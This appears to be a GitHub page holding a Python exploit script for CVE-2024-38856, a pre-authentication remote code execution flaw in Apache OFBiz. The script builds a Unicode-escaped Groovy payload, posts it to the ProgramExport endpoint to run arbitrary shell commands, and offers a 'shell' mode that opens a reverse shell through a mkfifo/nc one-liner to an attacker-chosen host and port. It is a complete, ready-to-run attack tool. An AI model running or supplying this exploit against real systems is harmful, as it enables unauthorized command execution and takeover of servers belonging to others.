-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2024-38856.py
97 lines (77 loc) · 2.98 KB
/
CVE-2024-38856.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#!/usr/bin/python3
"""
EXPLOIT - Apache OFBiz - CVE-2024-38856
Author:
Alisson Faoli
Github:
https://github.com/AlissonFaoli
LinkedIn:
https://linkedin.com/in/alisson-faoli/
References:
https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
https://www.cyfirma.com/research/cve-2024-38856-pre-authentication-remote-code-execution-rce-vulnerability-analysis-and-exploitation/
"""
# Python version >= 3.10
import requests, sys, re
requests.urllib3.disable_warnings()
def generate_payload(cmd: str) -> str:
payload = f'throw new Exception(new ProcessBuilder("sh", "-c", "{cmd}").redirectErrorStream(true).start().inputStream.text)'
return ''.join([f'\\u{ord(i):04x}' for i in payload])
def exploit(target:str, payload:str) -> str:
try:
resp = requests.post(f'{target}/webtools/control/main/ProgramExport', data={'groovyProgram': payload}, verify=False)
except Exception as error:
sys.stderr.write(f'[!] Error - {error}\n')
sys.exit()
else:
success = re.search(r'<p>.*java\.lang\.Exception: (.*)\n.*</p>', resp.text)
result = ''
if success:
result = success.group(1)
return result
def shell(target:str, lhost:str, lport:str) -> None:
shell_payload = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {lhost} {lport} >/tmp/f'
payload = generate_payload(shell_payload)
try:
exploit(target, payload)
except KeyboardInterrupt:
sys.exit()
except Exception as error:
sys.stderr.write(f'[!] Error - {error}\n')
def get_args() -> dict:
d = {}
args = sys.argv[2:]
for i in range(0, len(args), 2):
arg = args[i]
val = args[i+1]
match arg:
case '-t'|'--target':
if not val.startswith('http'):
val = 'http://' + val
d['target'] = val.strip('/')
case '-l'|'--lhost':
d['lhost'] = val
case '-p'|'--lport':
d['lport'] = val
case '-c'|'--cmd':
d['cmd'] = val
return d
def main() -> None:
help_message = f'Usage:\n\tRCE:\n\t\tpython3 {sys.argv[0]} cmd -t https://10.150.10.200:8443 -c "whoami"\n\tSHELL:\n\t\tpython3 {sys.argv[0]} shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444\n'
try:
if len(sys.argv) > 2 and not len(sys.argv) % 2:
mode = sys.argv[1].lower()
args = get_args()
if mode == 'shell' and len(args) == 3:
shell(args.get('target'), args.get('lhost'), args.get('lport'))
elif mode == 'cmd' and len(args) == 2:
print(exploit(args.get('target'), generate_payload(args.get('cmd'))))
else:
sys.stderr.write(help_message)
else:
print(help_message)
except:
sys.stderr.write(help_message)
if __name__ == '__main__':
main()